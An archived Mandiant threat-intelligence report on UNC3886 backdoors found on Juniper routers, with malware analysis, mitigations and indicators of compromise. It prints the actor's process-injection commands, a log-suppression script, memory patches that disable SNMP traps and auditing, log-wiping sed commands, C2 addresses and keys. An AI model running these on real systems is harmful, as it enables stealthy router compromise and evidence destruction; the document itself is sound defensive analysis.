{ "id": "6659a006-e120-4281-9fcd-01e16378217c", "created_at": "2026-04-06T00:08:50.875655Z", "updated_at": "2026-04-10T13:12:36.801214Z", "deleted_at": null, "sha1_hash": "99fd1cb12fde3916c86c1226af85a5d816145c8d", "title": "Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 190314, "plain_text": "Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets\r\nJuniper Routers\r\nBy Mandiant\r\nPublished: 2025-03-12 · Archived: 2026-04-05 20:33:35 UTC\r\nWritten by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, Frank Tse, Jakub Jozwiak, Mathew Potaczek,\r\nLogeswaran Nadarajan, Nick Harbour, Mustafa Nasser\r\nIntroduction\r\nIn mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers.\r\nMandiant attributed these backdoors to the China-nexus espionage group, UNC3886. Mandiant uncovered several\r\nTINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers. The backdoors had varying custom\r\ncapabilities, including active and passive backdoor functions, as well as an embedded script that disables logging\r\nmechanisms on the target device.\r\nMandiant worked with Juniper Networks to investigate this activity and observed that the affected Juniper MX routers were\r\nrunning end-of-life hardware and software. Mandiant recommends that organizations upgrade their Juniper devices to the\r\nlatest images released by Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware\r\nRemoval Tool (JMRT). Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade. Juniper also\r\nreleased an advisory about this incident.\r\nMandiant has reported on similar custom malware ecosystems in 2022 and 2023 that UNC3886 deployed on virtualization\r\ntechnologies and network edge devices. This blog post showcases a development in UNC3886’s tactics, techniques and\r\nprocedures (TTPs), and their focus on malware and capabilities that enable them to operate on network and edge devices,\r\nwhich typically lack security monitoring and detection solutions, such as endpoint detection and response (EDR) agents. \r\nMandiant previously reported on UNC3886's emphasis on techniques to gather and use legitimate credentials to move\r\nlaterally within a network, undetected. These objectives remained consistent but were pursued with the introduction of a new\r\ntool in 2024. Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term\r\naccess to victim networks. UNC3886 continues to show a deep understanding of the underlying technology of the appliances\r\nbeing targeted.\r\nAt the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and\r\nthose publicly reported by other parties as Volt Typhoon or Salt Typhoon. \r\nRegister for our upcoming webinar for a deeper dive into the activity described in this blog post.\r\nAttribution\r\nUNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and\r\nvirtualization technologies with zero-day exploits. UNC3886 interests seem to be focused mainly on defense, technology,\r\nand telecommunication organizations located in the US and Asia. The activity described in this blog post is the latest in a\r\nnumber of operations where UNC3886 has leveraged custom malware to target network devices. The malware deployed on\r\nJuniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals.\r\nFurthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with\r\nlog and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection.\r\nJunos OS\r\nJuniper Networks Junos OS is a proprietary operating system that powers most Juniper routing, switching, and security\r\ndevices. It is based on a modified FreeBSD operating system. Junos OS supports 2 different modes of operations:\r\nCLI mode: where standard Junos OS CLI commands can be issued\r\nShell mode: a user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD\r\ncommands.\r\nMalware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher\r\nlayers.\r\nVeriexec\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 1 of 13\n\nJunos OS incorporates a Verified Exec (veriexec) subsystem, which is a modified version of an original NetBSD Veriexec\r\nSubsystem. Veriexec is a kernel-based file integrity subsystem that protects the Junos OS operating system (OS) against\r\nunauthorized code including binaries, libraries, and scripts and activity that might compromise the integrity of the device. To\r\nrun malware, the threat actor first needed to bypass veriexec protection.\r\nMandiant did not observe evidence indicating successful exploitation of veriexec bypass techniques already addressed by\r\nJuniper in supported software and hardware. However, aside from the process injection technique described later in this blog\r\npost, infection on the compromised EOL Juniper MX routers indicate that the threat actor successfully deployed executable\r\nbackdoors. Mandiant identified the threat actor had root access to the impacted devices.\r\nCircumventing Veriexec with Process Injection\r\nVeriexec protection prevents unauthorized binaries from executing. This poses a challenge for threat actors, as disabling\r\nveriexec can trigger alerts. However, execution of untrusted code is still possible if it occurs within the context of a trusted\r\nprocess. Mandiant’s investigation revealed that UNC3886 was able to circumvent this protection by injecting malicious code\r\ninto the memory of a legitimate process. This specific technique is now tracked as CVE-2025-21590, as detailed in Juniper\r\nNetwork’s security bulletin JSA93446.\r\nTo achieve this, UNC3886 first gained privileged access to a Juniper router from a terminal server used for managing\r\nnetwork devices using legitimate credentials, and entered the FreeBSD shell from the Junos OS CLI. Within the shell\r\nenvironment, they used the “here document” feature to generate a Base64-encoded file named ldb.b64 . This encoded file\r\nwas then decoded using base64 to create a compressed archive named ldb.tar.gz , which was subsequently\r\ndecompressed and extracted using the gunzip and tar utilities to extract malicious binaries.\r\nMandiant was unable to recover the full content of ldb.b64 or ldb.tar.gz on the compromised Juniper routers' file\r\nsystem. However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a\r\ncompromised router. The purpose of the payloads was as follows:\r\nloader.bin is a shellcode loader responsible for loading functions including exit , mmap , open , read , and\r\nclose from a standard library libc.so.7 , allocating memory, and loading and executing the final payload from\r\npayload.bin\r\npc.bin contains a memory address 0x4012f0\r\npayload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor\r\nDetails of lmpad backdoor are covered in the Malware Analysis section.\r\nMandiant observed the threat actor inject malicious payloads into a newly spawned cat process. The actor created a\r\nnamed pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process.\r\nThis stage involved the following commands:\r\nrm -rf null;\r\nmkfifo null;\r\ncat null \u0026\r\nset pid=$!\r\necho \" $pid\"\r\nWhile the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data\r\nfrom the payload files and write it to specific memory locations inside the cat process.\r\ndd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x4012f0\r\ndd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x602820\r\nThe first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint\r\nof cat . The second dd command replaced data at 0x602820 with the content of pc.bin . Mandiant noted that\r\n0x602820 is the global offset table entry for fclose , this memory location was overwritten with 0x4012f0 , indicating\r\nthat pc.bin contains the memory address where loader.bin was injected to.\r\nThe threat actor sent an empty string using echo to the null pipe. cat received an end-of-file signal after echo\r\nfinished writing the data and attempted to close the file by executing fclose .\r\nAs the global offset table entry for fclose function was replaced with the entrypoint to the shellcode loader, cat\r\nexecuted the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from\r\npayload.bin in the same directory.\r\nAfter payload.bin has been loaded, the threat actor removed the null file and the ldb directory, then terminated the\r\ncurrent session. This left only the legitimate process running on the compromised router, now containing the malicious code.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 2 of 13\n\nThe following commands were used to achieve these actions:\r\nsleep 1;echo -n\u003enull;sleep 1;rm -rf null\r\ncd ..\r\nrm -rf ldb\r\nkill -9 $$\r\nMandiant’s investigation noted that this process injection is intended for executing the PIC version of the lmpad backdoor\r\nwhile veriexec is enabled and does not support execution of other backdoors identified on the file system of the\r\ncompromised Juniper routers. \r\nMalware Overview\r\nMandiant’s investigation identified six distinct malware samples across multiple Juniper MX routers. Each sample is a\r\nmodified version of a TINYSHELL backdoor, but with unique capabilities. All of these samples incorporate a core\r\nTINYSHELL backdoor functionality, but differ greatly when it comes to activation methods as well as additional, Junos OS\r\nspecific features.\r\nThe following malware samples were identified:\r\n1. appid - TINYSHELL-based active backdoor, mimicking a legitimate binary named appidd (Application\r\nIdentification Daemon)\r\n2. to - TINYSHELL-based active backdoor, mimicking a legitimate binary named top (Table of Processes)\r\n3. irad - TINYSHELL-based passive backdoor, mimicking a legitimate binary named irsd (Interface Replication and\r\nSynchronization Daemon)\r\n4. lmpad - TINYSHELL-based utility and passive backdoor, mimicking a legitimate binary named lmpd (Link\r\nManagement Protocol Daemon)\r\n5. jdosd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named jddosd (Juniper DDOS\r\nprotection Daemon)\r\n6. oemd - TINYSHELL-based passive backdoor, mimicking a legitimate binary named oamd (Operation,\r\nAdministration and Maintenance Daemon)\r\nTINYSHELL\r\nTINYSHELL is a publicly available lightweight backdoor written in C that communicates using a custom binary protocol.\r\nThe standard set of TINYSHELL commands comprises of:\r\nRemote file upload\r\nRemote file download\r\nEstablishing remote shell session\r\nA basic TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors detailed as\r\nfollows.\r\nMalware Analysis\r\nappid — TINYSHELL-Based Active Backdoor\r\nSample one, named appid , is an active backdoor written in C. It is derived from the publicly available TINYSHELL\r\nsource code with additional supported commands. It is an active backdoor that communicates to the following hardcoded\r\ncommand and control (C2) servers:\r\nTCP://129[.]126[.]109[.]50:22\r\nTCP://116[.]88[.]34[.]184:22\r\nTCP://223[.]25[.]78[.]136:22\r\nTCP://45[.]77[.]39[.]28:22\r\nMandiant believes these IPs are staging nodes of a GOBRAT ORB network, eventually leading to a single, backend\r\nAdversary Controlled Operations Server (“ACOS”).\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 3 of 13\n\nThis malware begins by communicating to a random C2 server from the list. The malware maintains two TCP sockets that\r\nwill stay synchronized with the same C2 address. One socket is used for tasking requests and the other is for handling\r\nrequests. The malware will rotate through the list of C2 servers until a successful connection is created and it will request a\r\ntask using the first socket. After receiving a task from the C2, the malware then creates a second socket for handling this\r\nspecific task. After the task is finished, the second socket is closed.\r\nThe malware encrypts all network traffic with AES using a hard-coded key. The following commands are supported by\r\nmalware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities:\r\nNumber Name Description Comment\r\n1 tshd_get_file Sends a file to the server Standard TINYSHELL command\r\n2 tshd_put_file Downloads a file from the server Standard TINYSHELL command\r\n3 tshd_runshell Launches an interactive /bin/sh shell session Standard TINYSHELL command\r\n4 tshd_setproxy Establish a Socks proxy to a given IP+port number Custom command\r\n5 tshd_config Change Configuration Menu Custom command\r\nThe following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their\r\nassociated config menu numbers:\r\nNumber Config Item\r\n11 C2 IP Address 1\r\n12 C2 IP Address 2\r\n13 C2 IP Address 3\r\n14 C2 IP Address 4\r\n2 C2 Port Number\r\n3 C2 Network Interface\r\n4 Sleep Timeout\r\n0 Exit Config Menu\r\nto — TINYSHELL-Based Active Backdoor \r\nSample two, named to , is the same as Sample 1 but with different hardcoded C2 servers:\r\ntcp://101[.]100[.]182[.]122:22\r\ntcp://118[.]189[.]188[.]122:22\r\ntcp://158[.]140[.]135[.]244:22\r\ntcp://8[.]222[.]225[.]8:22\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 4 of 13\n\nirad — TINYSHELL-Based Passive Backdoor\r\nSample three, named irad , is a TINYSHELL-based passive backdoor written in C. It acts as a libpcap-based packet sniffer\r\nand receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities.\r\nMalware supports 2 modes of operation: active mode, in which it will connect to a provided C2 address, or a passive -\r\nlistening mode.  In addition to 3 standard TINYSHELL commands, it implements 2 custom commands and a custom\r\nactivation routine.\r\nThe malware uses libpcap library to capture all network packets on the host (interface specified in the eth environment\r\nvariable) matching the BPF filter of icmp[4:2] == 0xaa56 . It reads 16 bytes of data starting at offset 10 from the ICMP\r\npacket. The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than\r\nexpected packet is encountered.\r\nFor any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single byte XOR key\r\n0x86 . It then compares the decrypted data with a magic string uSarguuS62bKRA0J . If the string matches and the byte 8 of\r\nthe ICMP packet matches ascii character 1 or 2 , it then reads the target IP and TCP port number from the ICMP packet\r\nand establishes a TCP connection to the specified IP (active mode). It uses a custom AES and HMAC implementation to\r\nencrypt and authenticate the communication. It uses a hardcoded key string WZtOTig2m42gXB6U to derive session keys and a\r\nhardcoded authentication token 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D to authenticate a target.\r\nAfter authenticating a connection to a target host it starts encrypted communication. If the response from the target host\r\nbegins with the string ek63a21km7WSWkfk then it exits, otherwise it decodes the command number from the packet:\r\nCommand Number Function Comment\r\n1 Upload a file to the remote host Standard TINYSHELL command\r\n2 Download a file from the remote host Standard TINYSHELL command\r\n3 Launch an interactive /bin/csh session Standard TINYSHELL command\r\n4 Does nothing Custom command\r\n5 Relay the current connection to a specified IP and Port Custom command\r\nIf byte 8 of the ICMP packet is 0 , the malware will spawn a listening server on TCP port 31234 (passive mode). The\r\nlistening backdoor server supports the same set of 5 commands as listed in the previous table, and the same encryption and\r\nauthentication protocol.\r\nIf the string 1spCq0BMbJwCoeZn is received, and the malware is currently operating as a listener and accepting connections\r\non port 31234 , then it will terminate the listening process.\r\nlmpad — TINYSHELL-Based Utility and Passive Backdoor\r\nSample four, named lmpad is an utility and a passive backdoor written in C. In addition to standard TINYSHELL\r\ncapabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to\r\ninhibit logging. The main purpose of this malware is to disable all possible logging before the operator connects to the router\r\nto perform hands-on activities and then later restore the logs after the operator disconnects. \r\nThe malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4 encrypted message and\r\nsends an acknowledgement message in response. The malware also checks the decrypted received payload against the\r\nfollowing hex bytes, terminating the connection if it doesn't match.\r\n26 e7 2b 3a 1c a2 16 2d 61 89 57 a9 cd 4c e7 3c\r\nThe RC4 encryption key used to decrypt received UDP messages is: 0b3330c0b41d1ae2 .\r\nAfter the initial check, the malware enters a listening mode, waiting for commands. In addition to standard TINYSHELL\r\ncommands (command 2, 4 and 5) it also implements 5 other custom commands:\r\nCommand 0\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 5 of 13\n\nThis command inhibits logging in preparation of hands-on threat actor activity on the router. It begins by writing a\r\ncompressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log . It then executes the following command line to\r\ndecompress the archive, execute an embedded script with argument pre and clean up the script after execution:\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak pre ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nThe following is the uncompressed script file:\r\npre_ssh() {\r\n#closelog\r\ncp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0\r\nsed -i '' 's/\\/dev\\/null #//g' /mfs/var/etc/syslog.conf0\r\nsed -i '' 's/ / \\/dev\\/null #/g' /mfs/var/etc/syslog.conf\r\nps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1\r\n#last\r\ncp -r /var/log/utx.log /var/log/utx.log0\r\ncp -r /var/log/wtmp /var/log/wtmp0\r\n}\r\npost_ssh() {\r\n#relog\r\ncp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf\r\nrm -f /mfs/var/etc/syslog.conf0\r\nps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1\r\n#relast\r\ncp -r /var/log/wtmp0 /var/log/wtmp\r\ncp -r /var/log/utx.log /var/log/utx.log0\r\nrm -f /var/log/wtmp0\r\n}\r\nbackup() {\r\n#backconf\r\nrm -rf /var/rundb+\r\ncp -r /var/rundb /var/rundb+\r\ncp /var/db/commits /usr/lib/libjucomm.so.1\r\ntar -cf /config/usage_db /config/juniper.conf.*\r\ntar -cf /var/db/config/usage_db /var/db/config/juniper.conf.*\r\n}\r\nrestore() {\r\n#reconfig\r\ncp -r /var/rundb+/* /var/rundb\r\ncp /usr/lib/libjucomm.so.1 /var/db/commits\r\ntar -xf /config/usage_db -C /\r\ntar -xf /var/db/config/usage_db -C /\r\nrm -r /var/rundb+\r\nrm -f /usr/lib/libjucomm.so.1\r\nrm -f /config/usage_db\r\nrm -f /var/db/config/usage_db\r\n}\r\nif [ $1 = \"pre\" ]; then\r\npre_ssh\r\nelif [ $1 = \"post\" ]; then\r\npost_ssh\r\nelif [ $1 = \"backup\" ]; then\r\nbackup\r\nelif [ $1 = \"restore\" ]; then\r\nrestore\r\nfi\r\necho done\r\nexit 0\r\nThis script can execute 4 commands:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 6 of 13\n\n1. pre : backups syslog.conf as syslog.conf0 , it also redirects all logging to /dev/null , sends HUP signal to\r\neventd daemon responsible for logging and backs up last log and wtmp log. \r\n2. post : reverses changes done by pre_ssh , it restores original syslog.conf as well as last log and wtmp log, it\r\nremoves backups and sends another HUP signal to eventd process. \r\n3. backup : it backups the current Juniper configuration database and commit logs and archives configuration files. \r\n4. restore : it restores previously backed up configuration database and config files and removes backups. \r\nAfter stopping logging with pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid .\r\nIt also reads 4 bytes of data from address 0x8601328 and writes it to the file /var/tmp/rts by using dd :\r\ndd if=/proc/\u003cpid\u003e/mem of=/var/tmp/rts bs=1 count=4 iseek=0x8601328 2\u003e/dev/null\r\nIt then changes this data to 0 and writes it to /var/tmp/rts and later back to snmpd process memory using the same dd\r\ntechnique:\r\ndd of=/proc/\u003cpid\u003e/mem if=/var/tmp/rts bs=1 count=4 oseek=0x8601328\r\nconv=notrunc 2\u003e/dev/null\r\nThis patches the snmpd process memory at address  0x8601328 . The patch sets a global variable named trap_configs to\r\n0. trap_configs possibly points to a structure containing SNMP traps that are sent to the monitoring server. Effectively\r\nthis stops SNMP traps from being triggered which is most likely done to stop SNMP traps from triggering when specific\r\nevents stop being logged in syslog. \r\nThe malware then repeats similar actions against the mgd (Juniper Management Daemon) process. It reads mgd process\r\nPID from /var/run/mgd.pid and using the same technique previously mentioned it reads 4 bytes from  mgd process\r\nmemory at 0x84E90D8 . It compares these bytes to 57E58955 (which after swapping endianness, disassembles to: PUSH\r\nRBP; MOV EBP,ESP; PUSH RDI instructions which is a typical function prologue), and if they match, it patches them with\r\nfollowing bytes: C3D08990 . If we disassemble these bytes from a little endian order, we get NOP; MOV EAX,EDX; RET\r\ninstructions.\r\nThis patch modifies the prologue of the function at 0x84E90D8 to NOP, MOV EAX,EDX, RET   effectively skipping the rest of\r\nthe function. Based on the behavioral analysis, the goal of this patch is likely to stop auditd logging of MGD login,\r\nlogout, cmd events.\r\nThis direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures.\r\nUNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup. In that case,\r\nUNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving\r\npersistence and evading security checks. \r\nCommand 1\r\nThis command can reverse operations performed by Command 0 after the operator finished their hands-on-keyboard\r\noperations. It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post , it also reverses patches to\r\nsnmpd and mgd .\r\nCommand 2 — Launch CSH Session\r\nThis command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the\r\ninput and output of the shell and transmitting it over the network.\r\nBefore executing remote shell, this commands launches a series of sed commands to remove specific lines from log files:\r\nsed -i '' '/root/d' /var/log/interactive-commands\r\nsed -i '' -e '/vi/d' -e '/set/d' -e '/gdb/d' -e '/mgd/d' /root/.history\r\nsed -i '' '/root/d' /var/log/messages\r\nsed -i '' '/root/d' /var/log/auth\r\nThese remove lines containing the term root from /var/log/interactive-commands , /var/log/messages , and\r\n/var/log/auth . They also remove instances of vi , set , gdb , and mgd from /root/.history .\r\nCommand 3 — Request New Sleep Timeout\r\nThis command will cause the malware to send a reply to the connection containing the value of the current sleep timeout.\r\nThe response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 7 of 13\n\nseconds).\r\nCommand 4 — File Upload\r\nThis command will cause the malware to send a specified file to the remote server.\r\nCommand 5 — File Download\r\nThis command will cause the malware to download a file from the remote server and write it to the disk.\r\nCommand 6 — Backup Configuration Database\r\nThis command causes the malware to execute the same script as Command 0 but with argument backup to backup Juniper\r\nconfiguration database and commit logs.\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak backup ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nCommand 7 — Restore configuration database\r\nThis command causes the malware to execute the same script as Command 0 but with argument restore to restore Juniper\r\nconfiguration database and commit logs:\r\ngzip -d /var/tmp/pfed_jdhcp6_trace.log -c \u003e /var/tmp/pfed_jdhcp6_trace.log.bak;\r\nsh /var/tmp/pfed_jdhcp6_trace.log.bak restore ;\r\nrm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;\r\nkill -9 $$\r\nCommand 8 - Receive new socket timeout value\r\nThis command will cause the malware to send a reply to the connection containing the value of the current socket timeout.\r\nThe response to that message will contain the new 4-byte value that will be used to update the main socket timeout. The\r\ndefault socket timeout value is 300 seconds\r\nIf any other command is passed, malware will close the socket and exit. \r\njdosd — TINYSHELL-Based Passive Backdoor\r\nSample five, named jdosd , is a passive backdoor written in C. It implements a UDP backdoor operating on a fixed port\r\nnumber which provides file transfer and remote shell capabilities.\r\nMalware binds to UDP port 33512 and uses a custom RC4 implementation. This implementation has a bug in it where it\r\ndoesn't properly retrieve a final state box value during its PRGA generation. The following key is used for the traffic\r\nencryption:\r\n4fd37426-65dd-4a8d-8ba6-1382a011dae9\r\nThe attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF . The malware responds to this\r\nmessage by sending the same message in response, encrypted with custom RC4. The malware will then send the process ID\r\n(pid) of its own process to the C2.\r\nAfter the initial beacon the malware waits for additional commands. In addition to standard TINYSHELL commands (1-3),\r\nthere are two additional commands supported(0xAC, 0xFF):\r\nCommand\r\nCode\r\nDescription Comment\r\n1\r\nUpload data. Reads a file path from the received data stream and sends\r\nthe contents of the file to the remote host.\r\nStandard TINYSHELL\r\ncommand\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 8 of 13\n\nCommand\r\nCode\r\nDescription Comment\r\n2\r\nReads a file name from the data stream, creates it, then reads the file\r\ncontents to write to that file from the data stream.\r\nStandard TINYSHELL\r\ncommand\r\n3\r\nLaunches an interactive /bin/csh session, with all input and output\r\nmarshaled across the UDP connection\r\nStandard TINYSHELL\r\ncommand\r\n0xAC Does nothing Custom command\r\n0xFF Exits the Program Custom command\r\noemd — TINYSHELL-Based Passive Backdoor\r\nSample six, named oemd , is a passive backdoor written in C. The backdoor receives the C2 address and port by binding on\r\nspecific network interfaces. Network interfaces are stored in an environment variable. The backdoor communicates with the\r\nC2 over TCP. Communication with C2 is AES-encrypted and XOR-encoded.\r\nThe malware configuration is stored in the following environment variables:\r\nINTFS : The network interfaces' names to bind to.\r\nRTS : The routing addresses to bind to (instead of interfaces).\r\nUPRT : The port to bind to (if not specified, 45678 is used)\r\nDAEMON : Run the sample in the background.\r\nDuring initialization, malware executes following command to retrieve local-index number of an interface specified in the\r\nINTFS environment variable:\r\nifinfo '\u003cinterface\u003e' | grep local-index | grep -Eo '[0-9]+'\r\nAfter setting up a local UDP socket, malware binds to 0.0.0.0:\u003cport\u003e on the specified interfaces and waits for the\r\nattacker to send the C2 address and port. After receiving a C2 address on the UDP socket it establishes a new TCP\r\nconnection to the provided target.\r\nMalware supports a set of standard TINYSHELL commands:\r\n1 : Upload a file.\r\n2 : Download a file.\r\n3 : Execute a shell command.\r\nWhen executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify\r\nthe TERM value.\r\nJunos OS Specific Socket Options\r\nAll the previously listed samples create an AF_ROUTE socket using socket(AF_ROUTE(17), SOCK_SEQPACKET(5), 0) .\r\nRunning these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a\r\nJunosOS specific implementation.\r\nWe believe that this socket is used to establish a connection for communicating with the operating system's routing\r\nsubsystem. The AF_ROUTE constant designates the socket family for routing operations, and SOCK_SEQPACKET specifies a\r\nreliable, message-oriented connection. This socket is used to read and write a packet similar in structure to rt_* messages\r\non OpenBSD to retrieve the interface index. From all the samples, only oemd uses the ifinfo command to retrieve the\r\ninterface index, while other samples are using a custom rt_* messages via the socket.\r\nThe custom message contains an interface name and a logical sub interface. On Juniper routing devices, instead of tagging\r\npackets with VLAN IDs, sub-interfaces act as distinct interfaces with their own IP addresses, routing configurations, and\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 9 of 13\n\npotentially different security policies. The interface index value is then passed into a setsockopt call for a command and\r\ncontrol socket either TCP or UDP.\r\nActivity in Linux Environments\r\nMandiant continued to observe UNC3886 leverage similar TTPs and use of the same malware and utilities as detailed in our\r\nprevious blog post as follows:\r\nCommand execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA\r\nwith SEAELF loader, and BUSYBOX.\r\nInstead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deployed\r\nPITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH\r\nauthentications and capture SSH credentials.\r\nTACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for\r\ncapturing credentials.\r\nUse of GHOSTTOWN malware for anti-forensics purposes.\r\nMandiant’s investigation did not observe evidence of data staging and exfiltration.\r\nOutlook and Implications\r\nThis blog post further highlights China-nexus espionage actors  are continuing to compromise networking infrastructure\r\nwith custom malware ecosystems. While UNC3886 previously focused their operations on network edge devices, this\r\nactivity demonstrated they’re also targeting internal networking infrastructure, such as Internet Service Provider (ISP)\r\nrouters.\r\nMandiant observed the threat actor targeting network authentication services, including the Terminal Access Controller\r\nAccess-Control System (TACACS+), and terminal servers with access to the routers to gain privileged initial access.\r\nThis privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations. Investigating\r\nfurther actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices,\r\nwhich required novel methods for artifact acquisition and analysis. \r\nMandiant recommends organizations:\r\nUpgrade Juniper devices and run security checks: Organizations should upgrade their Juniper devices to the latest\r\nimages which contain mitigations and updated signatures for JMRT and run JMRT Quick Scan and Integrity check\r\nafter the upgrade. \r\nSecure Authentication: Implement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices.\r\nConfiguration Management: Implement a network configuration management that supports configuration\r\nvalidation against defined templates and standards, with the ability to automatically remediate deviations or trigger\r\nalerts for manual intervention.\r\nEnhanced Monitoring: Address and prioritize high-risk administrative activities and implement monitoring\r\nsolutions with a process to regularly review the effectiveness of detection.\r\nVulnerability Management: Prioritize patching and mitigation of vulnerabilities in network devices, including those\r\nin lesser-known operating systems.\r\nDevice Lifecycle Management: Implement a device lifecycle management program that includes proactive\r\nmonitoring, automated software updates, and end-of-life (EOL) replacement planning to ensure network devices are\r\nalways supported and secure. \r\nSecurity Hardening: Strengthen the security posture of network devices, administrative devices and systems used\r\nfor managing network devices by implementing strict access controls, network segmentation, and other security\r\nmeasures.\r\nThreat Intelligence: Proactively leverage threat intelligence to continually evaluate and improve the effectiveness of\r\nsecurity controls against emerging threats.\r\nThe compromise of routing devices is a recent trend in the tactics of espionage-motivated adversaries as it grants the\r\ncapability for a long-term, high-level access to the crucial routing infrastructure, with a potential for more disruptive actions\r\nin the future. A concerted effort is required to safeguard these critical systems and ensure the continued stability and security\r\nof the internet.\r\nOrganizations potentially impacted by this campaign are strongly advised to engage Mandiant's Custom Threat Hunt service.\r\nMandiant's team of security experts can proactively identify and mitigate hidden threats, providing clarity and confidence in\r\nyour security posture.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 10 of 13\n\nAcknowledgement\r\nThis analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group\r\nand Mandiant’s FLARE. A special thanks goes to Paul Tarter, Adam Markun, and Ange Albertini who contributed to\r\nanalysis of the malware detailed in this blog post.\r\nIndicators of Compromise\r\nA Google Threat Intelligence Collection of IOCs is available for registered users. For Google Security Operations\r\nEnterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs)\r\nlisted in this blog post are available for prioritization with Applied Threat Intelligence.\r\nHost-Based Indicators\r\nFilename\r\nMalware\r\nFamily\r\nMD5 SHA1 SHA256\r\nappid TINYSHELL 2c89a18944d3a895bd6432415546635e 50520639cf77df0c15cc95076fac901e3d04b708 98380ec6bf4e03d3ff490c\r\nirad TINYSHELL aac5d83d296df81c9259c9a533a8423a 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91 5bef7608d66112315eefff\r\njdosd TINYSHELL 8023d01ffb7a38b582f0d598afb974ee 06a1f879da398c00522649171526dc968f769093 c0ec15e08b4fb3730c5695\r\nlmpad TINYSHELL 5724d76f832ce8061f74b0e9f1dcad90 f8697b400059d4d5082eee2d269735aa8ea2df9a 